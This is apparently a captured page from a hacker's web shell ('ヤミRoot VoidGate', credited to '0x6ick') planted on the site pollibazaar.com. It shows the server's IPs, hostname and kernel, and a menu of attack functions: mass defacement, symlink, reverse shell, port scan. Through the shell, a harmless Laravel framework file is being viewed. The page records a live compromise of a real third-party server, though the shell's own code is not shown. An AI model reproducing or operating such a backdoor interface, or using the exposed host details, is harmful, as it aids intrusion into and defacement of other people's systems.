ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Console
/
Viewing: Prohibitable.php
<?php namespace Illuminate\Console; trait Prohibitable { /** * Indicates if the command should be prohibited from running. * * @var bool */ protected static $prohibitedFromRunning = false; /** * Indicate whether the command should be prohibited from running. * * @param bool $prohibit * @return void */ public static function prohibit($prohibit = true) { static::$prohibitedFromRunning = $prohibit; } /** * Determine if the command is prohibited from running and display a warning if so. * * @param bool $quiet * @return bool */ protected function isProhibited(bool $quiet = false) { if (! static::$prohibitedFromRunning) { return false; } if (! $quiet) { $this->components->warn('This command is prohibited from running in this environment.'); } return true; } }
Coded With 💗 by
0x6ick